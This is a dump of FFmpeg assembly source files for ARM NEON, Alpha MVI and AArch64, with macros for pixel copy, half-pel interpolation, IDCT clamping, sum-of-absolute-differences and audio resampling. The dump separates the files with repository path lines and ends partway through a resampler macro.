vst1.8 {q15}, [r0,:128], r2
bx lr
.endm
@ 8-wide block copy (or destination average with \avg=1), 4 rows per
@ iteration.  r0 = dst (8-byte aligned), r1 = src, r2 = stride,
@ r3 = height (multiple of 4).
.macro pixels8 rnd=1, avg=0
1: vld1.8 {d0}, [r1], r2
vld1.8 {d1}, [r1], r2
vld1.8 {d2}, [r1], r2
pld [r1, r2, lsl #2]
vld1.8 {d3}, [r1], r2
pld [r1]
pld [r1, r2]
pld [r1, r2, lsl #1]
.if \avg
vld1.8 {d4}, [r0,:64], r2
vrhadd.u8 d0, d0, d4
vld1.8 {d5}, [r0,:64], r2
vrhadd.u8 d1, d1, d5
vld1.8 {d6}, [r0,:64], r2
vrhadd.u8 d2, d2, d6
vld1.8 {d7}, [r0,:64], r2
vrhadd.u8 d3, d3, d7
sub r0, r0, r2, lsl #2 @ rewind dst 4 rows after the loads
.endif
subs r3, r3, #4
vst1.8 {d0}, [r0,:64], r2
vst1.8 {d1}, [r0,:64], r2
vst1.8 {d2}, [r0,:64], r2
vst1.8 {d3}, [r0,:64], r2
bne 1b
bx lr
.endm
@ 8-wide half-pel horizontal interpolation, two rows per iteration.
@ The vswp packs both shifted rows into q1 so a single "avg" (vrhadd
@ or vhadd per the pixfunc instantiation) handles both rows at once.
.macro pixels8_x2 rnd=1, avg=0
1: vld1.8 {q0}, [r1], r2
vext.8 d1, d0, d1, #1 @ row 0 shifted by one pixel
vld1.8 {q1}, [r1], r2
vext.8 d3, d2, d3, #1 @ row 1 shifted by one pixel
pld [r1]
pld [r1, r2]
subs r3, r3, #2
vswp d1, d2 @ q0 = rows, q1 = shifted rows
avg q0, q0, q1
.if \avg
vld1.8 {d4}, [r0,:64], r2
vld1.8 {d5}, [r0,:64]
vrhadd.u8 q0, q0, q2
sub r0, r0, r2
.endif
vst1.8 {d0}, [r0,:64], r2
vst1.8 {d1}, [r0,:64], r2
bne 1b
bx lr
.endm
@ 8-wide half-pel vertical interpolation: average of two consecutive
@ source rows.  Software-pipelined with a two-row epilogue.
.macro pixels8_y2 rnd=1, avg=0
sub r3, r3, #2
vld1.8 {d0}, [r1], r2
vld1.8 {d1}, [r1], r2
1: subs r3, r3, #2
avg d4, d0, d1
vld1.8 {d0}, [r1], r2
avg d5, d0, d1
vld1.8 {d1}, [r1], r2
pld [r1]
pld [r1, r2]
.if \avg
vld1.8 {d2}, [r0,:64], r2
vld1.8 {d3}, [r0,:64]
vrhadd.u8 q2, q2, q1
sub r0, r0, r2
.endif
vst1.8 {d4}, [r0,:64], r2
vst1.8 {d5}, [r0,:64], r2
bne 1b
@ epilogue: last two output rows
avg d4, d0, d1
vld1.8 {d0}, [r1], r2
avg d5, d0, d1
.if \avg
vld1.8 {d2}, [r0,:64], r2
vld1.8 {d3}, [r0,:64]
vrhadd.u8 q2, q2, q1
sub r0, r0, r2
.endif
vst1.8 {d4}, [r0,:64], r2
vst1.8 {d5}, [r0,:64], r2
bx lr
.endm
@ 8-wide 2x2 box filter (half-pel in both directions).  Horizontal
@ pair sums are carried in q8/q9 so each row is summed once; NRND
@ adds the +1 bias only in the no-rounding variant, and "shrn" is
@ vrshrn or vshrn accordingly.  Two-row epilogue after the loop.
.macro pixels8_xy2 rnd=1, avg=0
sub r3, r3, #2
vld1.8 {q0}, [r1], r2
vld1.8 {q1}, [r1], r2
NRND vmov.i16 q11, #1
pld [r1]
pld [r1, r2]
vext.8 d4, d0, d1, #1
vext.8 d6, d2, d3, #1
vaddl.u8 q8, d0, d4 @ pair sums, row 0
vaddl.u8 q9, d2, d6 @ pair sums, row 1
1: subs r3, r3, #2
vld1.8 {q0}, [r1], r2
pld [r1]
vadd.u16 q10, q8, q9
vext.8 d4, d0, d1, #1
NRND vadd.u16 q10, q10, q11
vaddl.u8 q8, d0, d4
shrn d5, q10, #2
vld1.8 {q1}, [r1], r2
vadd.u16 q10, q8, q9
pld [r1, r2]
.if \avg
vld1.8 {d7}, [r0,:64]
vrhadd.u8 d5, d5, d7
.endif
NRND vadd.u16 q10, q10, q11
vst1.8 {d5}, [r0,:64], r2
shrn d7, q10, #2
.if \avg
vld1.8 {d5}, [r0,:64]
vrhadd.u8 d7, d7, d5
.endif
vext.8 d6, d2, d3, #1
vaddl.u8 q9, d2, d6
vst1.8 {d7}, [r0,:64], r2
bgt 1b
@ epilogue: final two output rows
vld1.8 {q0}, [r1], r2
vadd.u16 q10, q8, q9
vext.8 d4, d0, d1, #1
NRND vadd.u16 q10, q10, q11
vaddl.u8 q8, d0, d4
shrn d5, q10, #2
vadd.u16 q10, q8, q9
.if \avg
vld1.8 {d7}, [r0,:64]
vrhadd.u8 d5, d5, d7
.endif
NRND vadd.u16 q10, q10, q11
vst1.8 {d5}, [r0,:64], r2
shrn d7, q10, #2
.if \avg
vld1.8 {d5}, [r0,:64]
vrhadd.u8 d7, d7, d5
.endif
vst1.8 {d7}, [r0,:64], r2
bx lr
.endm
@ Instantiate ff_\pfx\name\suf\()_neon from one of the pixelsN macros
@ above.  First defines the rounding-dependent helper macros:
@   avg  - pairwise average: vrhadd (rounding) or vhadd (truncating)
@   shrn - narrowing shift: vrshrn (rounding) or vshrn (plain)
@   NRND - emits its argument only in the no-rounding variant
@ then purges them so the next instantiation can redefine them.
.macro pixfunc pfx, name, suf, rnd=1, avg=0
.if \rnd
.macro avg rd, rn, rm
vrhadd.u8 \rd, \rn, \rm
.endm
.macro shrn rd, rn, rm
vrshrn.u16 \rd, \rn, \rm
.endm
.macro NRND insn:vararg
.endm
.else
.macro avg rd, rn, rm
vhadd.u8 \rd, \rn, \rm
.endm
.macro shrn rd, rn, rm
vshrn.u16 \rd, \rn, \rm
.endm
.macro NRND insn:vararg
\insn
.endm
.endif
function ff_\pfx\name\suf\()_neon, export=1
\name \rnd, \avg
endfunc
.purgem avg
.purgem shrn
.purgem NRND
.endm
@ Instantiate both the rounding and the _no_rnd variant of a pixel op.
.macro pixfunc2 pfx, name, avg=0
pixfunc \pfx, \name, rnd=1, avg=\avg
pixfunc \pfx, \name, _no_rnd, rnd=0, avg=\avg
.endm
@ The h264 qpel mc00 entry points only set the height in r3 and then
@ FALL THROUGH (no branch before "endfunc") into the pixels16/pixels8
@ body that pixfunc emits immediately after them - the textual order
@ of these instantiations is load-bearing.
@ Note: the avg_ pixels8 family deliberately uses pixfunc (rounding
@ only), not pixfunc2 - no _no_rnd avg 8-pixel variants are needed.
function ff_put_h264_qpel16_mc00_neon, export=1
mov r3, #16
endfunc
pixfunc put_, pixels16, avg=0
pixfunc2 put_, pixels16_x2, avg=0
pixfunc2 put_, pixels16_y2, avg=0
pixfunc2 put_, pixels16_xy2, avg=0
function ff_avg_h264_qpel16_mc00_neon, export=1
mov r3, #16
endfunc
pixfunc avg_, pixels16, avg=1
pixfunc2 avg_, pixels16_x2, avg=1
pixfunc2 avg_, pixels16_y2, avg=1
pixfunc2 avg_, pixels16_xy2, avg=1
function ff_put_h264_qpel8_mc00_neon, export=1
mov r3, #8
endfunc
pixfunc put_, pixels8, avg=0
pixfunc2 put_, pixels8_x2, avg=0
pixfunc2 put_, pixels8_y2, avg=0
pixfunc2 put_, pixels8_xy2, avg=0
function ff_avg_h264_qpel8_mc00_neon, export=1
mov r3, #8
endfunc
pixfunc avg_, pixels8, avg=1
pixfunc avg_, pixels8_x2, avg=1
pixfunc avg_, pixels8_y2, avg=1
pixfunc avg_, pixels8_xy2, avg=1
|
Akagi201/ffmpeg-xcode
| 4,948
|
ffmpeg-3.0.2/libavcodec/alpha/idctdsp_alpha_asm.S
|
/*
* Alpha optimized IDCT-related routines
* Copyright (c) 2002 Falk Hueffner <falk@debian.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
/*
* These functions are scheduled for pca56. They should work
* reasonably on ev6, though.
*/
#include "regdef.h"
.set noat
.set noreorder
.arch pca56
.text
/************************************************************************
* void put_pixels_clamped_mvi_asm(const int16_t *block, uint8_t *pixels,
* ptrdiff_t line_size)
*/
/*
 * Clamp int16 coefficients to 0..255 and store them as bytes.
 * a0 = block (int16), a1 = pixels, a2 = line_size.
 * Two 8-pixel rows per iteration; t9 counts 8 -> 0 by 2, so the
 * block is the usual 8x8.  Uses the MVI extensions (maxsw4/minsw4
 * clamp four packed words, pkwb packs words to bytes).
 */
.align 6
.globl put_pixels_clamped_mvi_asm
.ent put_pixels_clamped_mvi_asm
put_pixels_clamped_mvi_asm:
.frame sp, 0, ra
.prologue 0
lda t8, -1
lda t9, 8 # loop counter
zap t8, 0xaa, t8 # 00ff00ff00ff00ff
.align 4
1: ldq t0, 0(a0)
ldq t1, 8(a0)
ldq t2, 16(a0)
ldq t3, 24(a0)
maxsw4 t0, zero, t0 # clamp each word to >= 0
subq t9, 2, t9
maxsw4 t1, zero, t1
lda a0, 32(a0)
maxsw4 t2, zero, t2
addq a1, a2, ta # ta = second row pointer
maxsw4 t3, zero, t3
minsw4 t0, t8, t0 # clamp each word to <= 255
minsw4 t1, t8, t1
minsw4 t2, t8, t2
minsw4 t3, t8, t3
pkwb t0, t0 # pack 4 words -> 4 bytes
pkwb t1, t1
pkwb t2, t2
pkwb t3, t3
stl t0, 0(a1)
stl t1, 4(a1)
addq ta, a2, a1 # pixels += 2 * line_size
stl t2, 0(ta)
stl t3, 4(ta)
bne t9, 1b
ret
.end put_pixels_clamped_mvi_asm
/************************************************************************
* void add_pixels_clamped_mvi_asm(const int16_t *block, uint8_t *pixels,
* ptrdiff_t line_size)
*/
/*
 * Add int16 coefficients to pixels with clamping to 0..255.
 * a0 = block (int16), a1 = pixels, a2 = line_size; 8x8, two rows per
 * iteration (th counts 8 -> 0 by 2).
 * Signed add trick: the sign bits of the coefficients are masked out
 * (bic with tg = 0x8000...), the unsigned add is done on the low 15
 * bits, and the saved sign bits are xor-ed back in - equivalent to a
 * lane-wise signed add with no carry between packed words.  maxsw4/
 * minsw4 then clamp, pkwb packs back to bytes.
 * Trailing "q o" comments are (quarter number / operation number)
 * scheduling annotations.
 */
.align 6
.globl add_pixels_clamped_mvi_asm
.ent add_pixels_clamped_mvi_asm
add_pixels_clamped_mvi_asm:
.frame sp, 0, ra
.prologue 0
lda t1, -1
lda th, 8
zap t1, 0x33, tg
nop
srl tg, 1, t0
xor tg, t0, tg # 0x8000800080008000
zap t1, 0xaa, tf # 0x00ff00ff00ff00ff
.align 4
1: ldl t1, 0(a1) # pix0 (try to hit cache line soon)
ldl t4, 4(a1) # pix1
addq a1, a2, te # pixels += line_size
ldq t0, 0(a0) # shorts0
ldl t7, 0(te) # pix2 (try to hit cache line soon)
ldl ta, 4(te) # pix3
ldq t3, 8(a0) # shorts1
ldq t6, 16(a0) # shorts2
ldq t9, 24(a0) # shorts3
unpkbw t1, t1 # 0 0 (quarter/op no.)
and t0, tg, t2 # 0 1
unpkbw t4, t4 # 1 0
bic t0, tg, t0 # 0 2
unpkbw t7, t7 # 2 0
and t3, tg, t5 # 1 1
addq t0, t1, t0 # 0 3
xor t0, t2, t0 # 0 4
unpkbw ta, ta # 3 0
and t6, tg, t8 # 2 1
maxsw4 t0, zero, t0 # 0 5
bic t3, tg, t3 # 1 2
bic t6, tg, t6 # 2 2
minsw4 t0, tf, t0 # 0 6
addq t3, t4, t3 # 1 3
pkwb t0, t0 # 0 7
xor t3, t5, t3 # 1 4
maxsw4 t3, zero, t3 # 1 5
addq t6, t7, t6 # 2 3
xor t6, t8, t6 # 2 4
and t9, tg, tb # 3 1
minsw4 t3, tf, t3 # 1 6
bic t9, tg, t9 # 3 2
maxsw4 t6, zero, t6 # 2 5
addq t9, ta, t9 # 3 3
stl t0, 0(a1) # 0 8
minsw4 t6, tf, t6 # 2 6
xor t9, tb, t9 # 3 4
maxsw4 t9, zero, t9 # 3 5
lda a0, 32(a0) # block += 16;
pkwb t3, t3 # 1 7
minsw4 t9, tf, t9 # 3 6
subq th, 2, th
pkwb t6, t6 # 2 7
pkwb t9, t9 # 3 7
stl t3, 4(a1) # 1 8
addq te, a2, a1 # pixels += line_size
stl t6, 0(te) # 2 8
stl t9, 4(te) # 3 8
bne th, 1b
ret
.end add_pixels_clamped_mvi_asm
|
Akagi201/ffmpeg-xcode
| 2,996
|
ffmpeg-3.0.2/libavcodec/alpha/hpeldsp_alpha_asm.S
|
/*
* Alpha optimized DSP utils
* Copyright (c) 2002 Falk Hueffner <falk@debian.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
/*
* These functions are scheduled for pca56. They should work
* reasonably on ev6, though.
*/
#include "regdef.h"
.set noat
.set noreorder
.arch pca56
.text
/************************************************************************
* void put_pixels_axp_asm(uint8_t *block, const uint8_t *pixels,
* int line_size, int h)
*/
# void put_pixels_axp_asm(uint8_t *block /* a0 */, const uint8_t *pixels /* a1 */,
#                         int line_size /* a2 */, int h /* a3 */)
# Copies h rows of 8 bytes from pixels to block, advancing both pointers
# by line_size per row.  Four rows are handled per loop iteration, so h
# is assumed to be a multiple of 4.
.align 6
.globl put_pixels_axp_asm
.ent put_pixels_axp_asm
put_pixels_axp_asm:
.frame sp, 0, ra
.prologue 0
and a1, 7, t0 # t0 = pixels & 7: source alignment
beq t0, $aligned
.align 4
$unaligned:
# Unaligned source: each row is assembled from two ldq_u loads merged
# with extql/extqh.
# NOTE(review): the extql/extqh below use a1 *after* it has already been
# advanced by line_size; since only the low 3 bits of the address matter
# to these instructions, this is correct only when line_size is a
# multiple of 8 — confirm callers guarantee that.
ldq_u t0, 0(a1)
ldq_u t1, 8(a1)
addq a1, a2, a1 # pixels += line_size
nop
ldq_u t2, 0(a1)
ldq_u t3, 8(a1)
addq a1, a2, a1
nop
ldq_u t4, 0(a1)
ldq_u t5, 8(a1)
addq a1, a2, a1
nop
ldq_u t6, 0(a1)
ldq_u t7, 8(a1)
extql t0, a1, t0 # row 0: low part
addq a1, a2, a1
extqh t1, a1, t1 # row 0: high part
addq a0, a2, t8 # t8 = dest of row 1
extql t2, a1, t2
addq t8, a2, t9 # t9 = dest of row 2
extqh t3, a1, t3
addq t9, a2, ta # ta = dest of row 3
extql t4, a1, t4
or t0, t1, t0 # row 0 assembled
extqh t5, a1, t5
or t2, t3, t2 # row 1 assembled
extql t6, a1, t6
or t4, t5, t4 # row 2 assembled
extqh t7, a1, t7
or t6, t7, t6 # row 3 assembled
stq t0, 0(a0)
stq t2, 0(t8)
stq t4, 0(t9)
subq a3, 4, a3 # h -= 4
stq t6, 0(ta)
addq ta, a2, a0 # block advances past the four stored rows
bne a3, $unaligned
ret
.align 4
$aligned:
# 8-byte-aligned source: plain quadword copies, four rows per pass.
ldq t0, 0(a1)
addq a1, a2, a1
ldq t1, 0(a1)
addq a1, a2, a1
ldq t2, 0(a1)
addq a1, a2, a1
ldq t3, 0(a1)
addq a0, a2, t4 # t4/t5/t6 = dests of rows 1..3
addq a1, a2, a1
addq t4, a2, t5
subq a3, 4, a3 # h -= 4
stq t0, 0(a0)
addq t5, a2, t6
stq t1, 0(t4)
addq t6, a2, a0 # next block pointer
stq t2, 0(t5)
stq t3, 0(t6)
bne a3, $aligned
ret
.end put_pixels_axp_asm
|
Akagi201/ffmpeg-xcode
| 6,202
|
ffmpeg-3.0.2/libavcodec/alpha/me_cmp_mvi_asm.S
|
/*
* Alpha optimized DSP utils
* Copyright (c) 2002 Falk Hueffner <falk@debian.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "regdef.h"
/* Some nicer register names. */
#define ta t10
#define tb t11
#define tc t12
#define td AT
/* Danger: these overlap with the argument list and the return value */
#define te a5
#define tf a4
#define tg a3
#define th v0
.set noat
.set noreorder
.arch pca56
.text
/*****************************************************************************
 * int pix_abs16x16_mvi_asm(void *v, uint8_t *pix1, uint8_t *pix2, int line_size, int h)
*
* This code is written with a pca56 in mind. For ev6, one should
* really take the increased latency of 3 cycles for MVI instructions
* into account.
*
* It is important to keep the loading and first use of a register as
* far apart as possible, because if a register is accessed before it
* has been fetched from memory, the CPU will stall.
*/
# Sum of absolute differences over a 16-pixel-wide block using the MVI
# "perr" (pixel error) instruction, which produces the byte-wise SAD of
# two quadwords.  Register arguments (see regdef.h):
#   a1 = pix1 (8-byte aligned reference), a2 = pix2, a3 = line_size, a4 = h
# Returns the accumulated SAD in v0.
# NOTE(review): the unaligned loop consumes 2 rows per pass and the
# aligned loop 4, so h must be even resp. a multiple of 4 — confirm.
.align 4
.globl pix_abs16x16_mvi_asm
.ent pix_abs16x16_mvi_asm
pix_abs16x16_mvi_asm:
.frame sp, 0, ra, 0
.prologue 0
and a2, 7, t0 # t0 = pix2 & 7: source alignment
clr v0 # SAD accumulator
beq t0, $aligned
.align 4
$unaligned:
/* Registers:
line 0:
t0: left_u -> left lo -> left
t1: mid
t2: right_u -> right hi -> right
t3: ref left
t4: ref right
line 1:
t5: left_u -> left lo -> left
t6: mid
t7: right_u -> right hi -> right
t8: ref left
t9: ref right
temp:
ta: left hi
tb: right lo
tc: error left
td: error right */
/* NOTE(review): the extql/extqh below run after a2 has been advanced by
line_size; only the low 3 bits of a2 matter to them, so this is valid
only when line_size is a multiple of 8. */
/* load line 0 */
ldq_u t0, 0(a2) # left_u
ldq_u t1, 8(a2) # mid
ldq_u t2, 16(a2) # right_u
ldq t3, 0(a1) # ref left
ldq t4, 8(a1) # ref right
addq a1, a3, a1 # pix1
addq a2, a3, a2 # pix2
/* load line 1 */
ldq_u t5, 0(a2) # left_u
ldq_u t6, 8(a2) # mid
ldq_u t7, 16(a2) # right_u
ldq t8, 0(a1) # ref left
ldq t9, 8(a1) # ref right
addq a1, a3, a1 # pix1
addq a2, a3, a2 # pix2
/* calc line 0 */
extql t0, a2, t0 # left lo
extqh t1, a2, ta # left hi
extql t1, a2, tb # right lo
or t0, ta, t0 # left
extqh t2, a2, t2 # right hi
perr t3, t0, tc # error left
or t2, tb, t2 # right
perr t4, t2, td # error right
addq v0, tc, v0 # add error left
addq v0, td, v0 # add error right
/* calc line 1 */
extql t5, a2, t5 # left lo
extqh t6, a2, ta # left hi
extql t6, a2, tb # right lo
or t5, ta, t5 # left
extqh t7, a2, t7 # right hi
perr t8, t5, tc # error left
or t7, tb, t7 # right
perr t9, t7, td # error right
addq v0, tc, v0 # add error left
addq v0, td, v0 # add error right
/* loop */
subq a4, 2, a4 # h -= 2
bne a4, $unaligned
ret
.align 4
$aligned:
# Aligned pix2: four rows per pass, straight quadword loads plus perr.
# a0 is reused as scratch here, so the incoming first argument is dead.
/* load line 0 */
ldq t0, 0(a2) # left
ldq t1, 8(a2) # right
addq a2, a3, a2 # pix2
ldq t2, 0(a1) # ref left
ldq t3, 8(a1) # ref right
addq a1, a3, a1 # pix1
/* load line 1 */
ldq t4, 0(a2) # left
ldq t5, 8(a2) # right
addq a2, a3, a2 # pix2
ldq t6, 0(a1) # ref left
ldq t7, 8(a1) # ref right
addq a1, a3, a1 # pix1
/* load line 2 */
ldq t8, 0(a2) # left
ldq t9, 8(a2) # right
addq a2, a3, a2 # pix2
ldq ta, 0(a1) # ref left
ldq tb, 8(a1) # ref right
addq a1, a3, a1 # pix1
/* load line 3 */
ldq tc, 0(a2) # left
ldq td, 8(a2) # right
addq a2, a3, a2 # pix2
ldq te, 0(a1) # ref left
ldq a0, 8(a1) # ref right
/* calc line 0 */
perr t0, t2, t0 # error left
addq a1, a3, a1 # pix1
perr t1, t3, t1 # error right
addq v0, t0, v0 # add error left
/* calc line 1 */
perr t4, t6, t0 # error left
addq v0, t1, v0 # add error right
perr t5, t7, t1 # error right
addq v0, t0, v0 # add error left
/* calc line 2 */
perr t8, ta, t0 # error left
addq v0, t1, v0 # add error right
perr t9, tb, t1 # error right
addq v0, t0, v0 # add error left
/* calc line 3 */
perr tc, te, t0 # error left
addq v0, t1, v0 # add error right
perr td, a0, t1 # error right
addq v0, t0, v0 # add error left
addq v0, t1, v0 # add error right
/* loop */
subq a4, 4, a4 # h -= 4
bne a4, $aligned
ret
.end pix_abs16x16_mvi_asm
|
Akagi201/ffmpeg-xcode
| 7,457
|
ffmpeg-3.0.2/libavresample/aarch64/resample_neon.S
|
/*
* Copyright (c) 2014 Janne Grunau <janne-libav@jannau.net>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/aarch64/asm.S"
#include "asm-offsets.h"
// Emits ff_resample_one_<fmt>_neon: computes one output sample as the
// dot product of a polyphase filter with the source window, i.e.
//   dst[dst_index] = sum(filter[i] * src[sample_index + i]).
// Registers on entry (presumably matching the C resample-one callback —
// confirm against libavresample/resample.c):
//   x0 = ResampleContext (FILTER_BANK/FILTER_LENGTH/PHASE_SHIFT offsets)
//   x1 = dst base, w2 = dst index, x3 = src, x4 = index
// \es = log2(element size).  Accumulators are v0 (and v1 where the
// format's macros use a second one); the element-type-specific macros
// LOAD*/M_MUL*/M_MLA*/STORE_ONE must be defined before instantiation.
// For every format except dbl, M_MUL2/M_MLA2 are stubbed out to no-ops
// here because a single M_MUL/M_MLA already consumes a full LOAD8.
.macro resample_one fmt, es=2
.ifnc \fmt, dbl
.macro M_MUL2 x:vararg
.endm
.macro M_MLA2 x:vararg
.endm
.endif
function ff_resample_one_\fmt\()_neon, export=1
sxtw x2, w2
ldr x9, [x0, #FILTER_BANK]
ldr w6, [x0, #FILTER_LENGTH]
ldp w7, w8, [x0, #PHASE_SHIFT] // and phase_mask
lsr x10, x4, x7 // sample_index
and x4, x4, x8 // phase = index & phase_mask
lsl x11, x6, #\es // filter_length * elem_size
add x3, x3, x10, lsl #\es // src[sample_index]
madd x9, x11, x4, x9 // filter = filter_bank + phase * length
cmp w6, #16
b.lt 5f
8: // remaining filter_length at least 16
subs w6, w6, #16
LOAD8 v4, v5, v6, v7, x3
LOAD8 v16, v17, v18, v19, x9
M_MUL v0, v4, v16, v1 // start the accumulators
M_MUL2 v1, v6, v18
7: // main loop: 16 taps per iteration, loads double-buffered
LOAD8 v20, v21, v22, v23, x3
M_MLA v0, v5, v17, v1
M_MLA2 v1, v7, v19
LOAD8 v24, v25, v26, v27, x9
M_MLA v0, v20, v24, v1
M_MLA2 v1, v22, v26
b.eq 6f // no taps left after this batch
cmp w6, #16
M_MLA v0, v21, v25, v1
M_MLA2 v1, v23, v27
b.lt 4f // 1-15 taps left: tail code
subs w6, w6, #16
LOAD8 v4, v5, v6, v7, x3
LOAD8 v16, v17, v18, v19, x9
M_MLA v0, v4, v16, v1
M_MLA2 v1, v6, v18
b 7b
6: // finish last batch, store and return
M_MLA v0, v21, v25, v1
M_MLA2 v1, v23, v27
STORE_ONE 0, x1, x2, v1
ret
5: // short filter (<16 taps): clear accumulators first
movi v0.16b, #0
movi v1.16b, #0
4: // remaining filter_length 1-15
cmp w6, #4
b.lt 2f
subs w6, w6, #4
LOAD4 v4, v5, x3
LOAD4 v6, v7, x9
M_MLA v0, v4, v6, v1
M_MLA2 v1, v5, v7
b.eq 0f
b 4b
2: // remaining filter_length 1-3
cmp w6, #2
b.lt 1f
LOAD2 2, x3
LOAD2 3, x9
subs w6, w6, #2
M_MLA v0, v2, v3
b.eq 0f
1: // remaining filter_length 1
LOAD1 6, x3
LOAD1 7, x9
M_MLA v0, v6, v7
0:
STORE_ONE 0, x1, x2, v1
ret
endfunc
// Drop the per-format macros so the next instantiation can redefine them.
.purgem LOAD1
.purgem LOAD2
.purgem LOAD4
.purgem LOAD8
.purgem M_MLA
.purgem M_MLA2
.purgem M_MUL
.purgem M_MUL2
.purgem STORE_ONE
.endm
// double (f64) element macros; elem size 8 (es=3).  dbl is the only
// format that really uses the second accumulator pair, so M_MLA2/M_MUL2
// forward to M_MLA/M_MUL instead of being stubbed out.
// LOAD1: one f64 into d<n>, post-incremented
.macro LOAD1 d1, addr
ldr d\d1, [\addr], #8
.endm
// LOAD2: two f64 into v<n>.2d
.macro LOAD2 d1, addr
ld1 {v\d1\().2d}, [\addr], #16
.endm
// LOAD4: four f64 across two registers
.macro LOAD4 d1, d2, addr
ld1 {\d1\().2d,\d2\().2d}, [\addr], #32
.endm
// LOAD8: eight f64 across four registers
.macro LOAD8 d1, d2, d3, d4, addr
ld1 {\d1\().2d,\d2\().2d,\d3\().2d,\d4\().2d}, [\addr], #64
.endm
// fused multiply-accumulate into the first accumulator
.macro M_MLA d, r0, r1, d2:vararg
fmla \d\().2d, \r0\().2d, \r1\().2d
.endm
// second-accumulator variant: same operation on the remaining operands
.macro M_MLA2 second:vararg
M_MLA \second
.endm
.macro M_MUL d, r0, r1, d2:vararg
fmul \d\().2d, \r0\().2d, \r1\().2d
.endm
.macro M_MUL2 second:vararg
M_MUL \second
.endm
// STORE_ONE: fold second accumulator in, reduce 2 lanes to a scalar,
// store dst[idx] (idx scaled by 8)
.macro STORE_ONE rn, addr, idx, d2
fadd v\rn\().2d, v\rn\().2d, \d2\().2d
faddp d\rn\(), v\rn\().2d
str d\rn\(), [\addr, \idx, lsl #3]
.endm
resample_one dbl, 3
// float (f32) element macros; elem size 4 (default es=2).  Only the v0
// accumulator is used: M_MLA2/M_MUL2 are stubbed to no-ops inside
// resample_one, and STORE_ONE ignores its \d2 argument.
.macro LOAD1 d1, addr
ldr s\d1, [\addr], #4
.endm
.macro LOAD2 d1, addr
ld1 {v\d1\().2s}, [\addr], #8
.endm
// LOAD4 uses only \d1 (four f32 fit one register)
.macro LOAD4 d1, d2, addr
ld1 {\d1\().4s}, [\addr], #16
.endm
// LOAD8 uses only \d1/\d2 (eight f32 fit two registers)
.macro LOAD8 d1, d2, d3, d4, addr
ld1 {\d1\().4s,\d2\().4s}, [\addr], #32
.endm
.macro M_MLA d, r0, r1, d2:vararg
fmla \d\().4s, \r0\().4s, \r1\().4s
.endm
.macro M_MUL d, r0, r1, d2:vararg
fmul \d\().4s, \r0\().4s, \r1\().4s
.endm
// horizontal sum of the 4 lanes, store dst[idx] (idx scaled by 4)
.macro STORE_ONE rn, addr, idx, d2
faddp v\rn\().4s, v\rn\().4s, v\rn\().4s
faddp s\rn\(), v\rn\().2s
str s\rn\(), [\addr, \idx, lsl #2]
.endm
resample_one flt
// s16 element macros; elem size 2 (es=1).  Products are widened to s32
// in q-form accumulators (smull/smlal); the second accumulator is
// unused (M_MLA2/M_MUL2 stubbed, STORE_ONE ignores \d2).
.macro LOAD1 d1, addr
ldr h\d1, [\addr], #2
.endm
// LOAD2: two s16 loaded as one 32-bit scalar
.macro LOAD2 d1, addr
ldr s\d1, [\addr], #4
.endm
// LOAD4 uses only \d1 (four s16 fit one 64-bit register)
.macro LOAD4 d1, d2, addr
ld1 {\d1\().4h}, [\addr], #8
.endm
// LOAD8 uses only \d1/\d2
.macro LOAD8 d1, d2, d3, d4, addr
ld1 {\d1\().4h,\d2\().4h}, [\addr], #16
.endm
.macro M_MLA d, r0, r1, d2:vararg
smlal \d\().4s, \r0\().4h, \r1\().4h
.endm
.macro M_MUL d, r0, r1, d2:vararg
smull \d\().4s, \r0\().4h, \r1\().4h
.endm
// horizontal s32 sum, then round/saturate back to s16 dropping the
// 15 fraction bits of the Q15 filter products
.macro STORE_ONE rn, addr, idx, d2
addp v\rn\().4s, v\rn\().4s, v\rn\().4s
addp v\rn\().4s, v\rn\().4s, v\rn\().4s
sqrshrn v\rn\().4h, v\rn\().4s, #15
str h\rn\(), [\addr, \idx, lsl #1]
.endm
resample_one s16, 1
// s32 element macros; elem size 4 (default es=2).  Products are widened
// to s64.  M_MLA/M_MUL take an optional second accumulator \d2 for the
// high half of the input (smlal2/smull2); STORE_ONE folds it back in.
.macro LOAD1 d1, addr
ldr s\d1, [\addr], #4
.endm
.macro LOAD2 d1, addr
ld1 {v\d1\().2s}, [\addr], #8
.endm
.macro LOAD4 d1, d2, addr
